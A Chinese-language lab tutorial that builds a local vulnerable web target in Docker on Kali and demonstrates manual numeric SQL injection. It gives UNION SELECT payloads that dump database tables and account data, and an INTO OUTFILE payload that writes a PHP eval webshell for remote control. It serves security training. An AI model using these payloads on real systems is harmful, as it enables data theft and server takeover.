很多新手小白入门后发现想要学好“网安”技术,除了掌握基础理论知识,更需要经常模拟不同的漏洞环境,但是如果使用外网服务器练习,会存在一定风险,因此能够搭建一个本地的模拟环境去测试漏洞将是一个不错的方案。
Docker是近几年来十分流行的开源容器引擎,开发者可以打包自己的应用到容器里面,然后迁移到其他机器的Docker应用中,实现快速部署。
环境搭建
首先,在kali中搭建这个DCN靶机系统,进入kali、打开终端、在终端里输入:
1、apt-get install docker
2、apt-get install docker.io
PS:如果出现“找不到软件包”错误,请检查你的kali是不是更新过的。
然后启动Docker服务:
1、service docker start
查看Docker服务运行状态:
1、service docker status
PS:一般此时的状态会很显眼的显示一个绿色的【active(running)】。
接着是要把Docker镜像上传到kali里面,导入镜像:
1、docker load < dcn_web_test.tar
2、docker load < dcn_upload.tar
这里导入的时候可能要花一段时间。
接着可以看一下Docker 镜像:
1、docker images
这里我们会发现REPOSITORY 和 TAG下面都显示“<none>”,我们来修改一下对应值:
1、docker tag [你的IMAGE ID] dcn_web_test:V 1.0
2、docker tag [你的IMAGE ID] dcn_upload:V 1.0
完成这些之后,就可以启动了!
启动:
1、docker run -itd -p 8888:80 dcn_web_test:V 1.0
容器运行之后,直接访问kali的IP地址,我的kali地址是192.168.10.100:
1、http://192.168.10.100:8888/
之后可以看到我们的靶机分为七个模块,包含了常见的Web漏洞。
接下来要展示的是:SQLi数值型注入。
示例演示
目标:获得所有的数据库信息和数据表信息,甚至提权、上传一句话木马等。
1)尝试输入数字1,submit提交,有结果输出:
2)输入数字2,submit提交,有结果输出:
3)输入数字3,submit提交:
4)判断是否存在注入:输入:3 or 1=1,submit:
显示了一行数据,说明存在注入漏洞。另外,通过前面的测试,得知数据表至少存在两行数据,此处注入成功后,查询结果集中,应该存在至少2行数据,但前端页面只显示了一行结果,由此猜测后端php程序对查询结果集的输出做了处理,即只输出查询结果集中的第一行数据发送到前端页面。
5)继续使用order by猜测有多少列
输入:3 or 1=1 order by 1 desc,表示对select查询结果集,按照第1列值降序排列,不加desc,默认按升序排列。
输入:3 or 1=1 order by 4 desc
有错误提示,第4列不存在,那么继续尝试按第3列排序,降序或升序都可以。
上图有结果显示,说明该数据表一共有3列,后端php程序对输出结果集做了处理,所以前端页面只显示两列数据。另外,需要注意的是,前端页面上显示的列标题,不一定就是数据表真正的列标题。
6)尝试通过union猜测显示的列
输入:1 union select 1,2,3,submit提交:
使用union关键字的目的,是为了输出想要的重要信息,但是由于php后端程序的处理,前端页面只显示结果集中的第一行,如果所给的id数字正确,那么union之后的select的结果集不会显示在前端页面,那么想要的重要信息也不会显示在前端页面。解决方法有两种:一种是union结合order by,如输入 1 union select 3,2,1 order by 1 desc,结果如图:
第二种是使用错误的id,如id为3,输入 3 union select 1,2,3,结果如下图:
两种方法都可以显示第二个select的输出结果,综合对比,第二种方法更加简洁一些,且显示输出的分别是第2列和第3列,那么接下来就尝试获取重要信息显示到第2列或第3列。
7)通过union select获取当前数据库用户和版本号,显示在第2列
输入:3 union select 1,user( ),3,submit提交
显示的用户是root,即当前php后台程序连接Mysql的身份是root
输入:3 union select 1,version( ),3,submit提交
上图显示了Mysql数据库管理系统的版本号,大于5.0以上,可以直接使用information_schema去“爆库”。
8)通过union select获取当前数据中所有的数据表,显示在第2列一个单元格中
输入:
3 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database( ),submit提交。
group_concat( )函数,将当前列的所有结果连接到一起,放到一个单元格中;information_schema,是系统数据库,类似于SQL Server中的Master数据库,如下图所示:
information_schema.tables,其中tables是information_schema数据库中的一个数据表,存储了mysql中所有的数据表名称,如下图:
table_schema,是tables表中的列名称;database( )函数,表示当前数据库,如下图:
Submit提交的结果如下图:
由图可知,当前数据库包含了两个数据表,分别是“account”和“news”。
9)通过union select获取已知数据表的所有列名称,显示在第2列一个单元格中,例如输入:
3 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='account'
3 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='news'
10)通过union select获取已知数据表的已知列的所有内容,显示在第2列和第3列的两个单元格中。
例如获取account表格的id列和rest列的所有内容,输入:
3 union select 1,group_concat(id),group_concat(rest) from account
例如获取account表格的rest列和own列的所有内容,输入:
3 union select 1,group_concat(rest),group_concat(own) from account
例如获取news表格的id列和title列的所有内容,输入:
3 union select 1,group_concat(id),group_concat(title) from news
例如获取news表格的title列和content列的所有内容,输入:
3 union select 1,group_concat(title),group_concat(content) from news
11)尝试通过union select写入一句话木马到站点目录
输入:
3 union select 1,2,'<?php eval($_POST[dcn]);?>' into outfile '/var/www/html/ttt1.php'
错误提示如下:
这种错误,一般是由于当前Mysql服务的Linux用户不具备对该目录的写入权限导致。
如何查看当前Mysql服务进程所属用户?
假设可以登录Linux控制台,进入Docker容器的系统环境:
输入 ps -aux ,截图如下:
从图中可以看出,Mysql服务进程为Mysqld,其用户为Mysql。
查看站点目录的权限:
站点目录默认一般为 /var/www/html ,查看html目录的权限如下:cd /var/www
ls -l -d html ,截图如下:
html目录为一个链接,真实的站点目录为 /app ,继续查看app目录的权限:
由上图可以看出,/app目录所属的用户和组为www-data,且只有www-data用户具备rwx权限,可以写入文件,而mysql服务进程的用户为Mysql,通过select的方式向 /app 目录写入文件失败,没有权限。
假设存在一个站点子目录,任何用户都具备写入权限,那么情况会怎样呢?
上图,在站点根目录下创建了一个子目录为 test-sql,且修改权限为“777”,既任意用户都具备对该目录的写入权限。
接下来继续测试通过select方式写入一句话木马文件:
输入:
3 union select 1,2,'<?php eval($_POST[dcn]);?>' into outfile '/var/www/html/test-sql/ttt1.php'
submit提交,截图如下:
注意,一句话木马的内容为:<?php eval($_POST[dcn]);?>
在Linux控制台中可以看到成功写入的一句话木马php文件:
12)通过“中国菜刀”连接写入的一句话木马文件
注意事项:
如果没有提供输入框和submit,那么如何实现注入?
如果是get方式提交请求,那么可以直接在URL中实现注入,如:
http://192.168.7.61:8888/sql_injection/sql_num.php?id=3+union+select+1%2Cversion%28%29%2C3&submit=submit
直接修改“?”号后面的内容即可,空格符在URL中用“+”号表示,逗号在URL中用“%2C”表示,左括号“(”在URL中用“%28”表示,右括号“)”在URL中用“%29”表示。
这样一次SQL手工注入并连接shell就完成了,大家看懂了吗?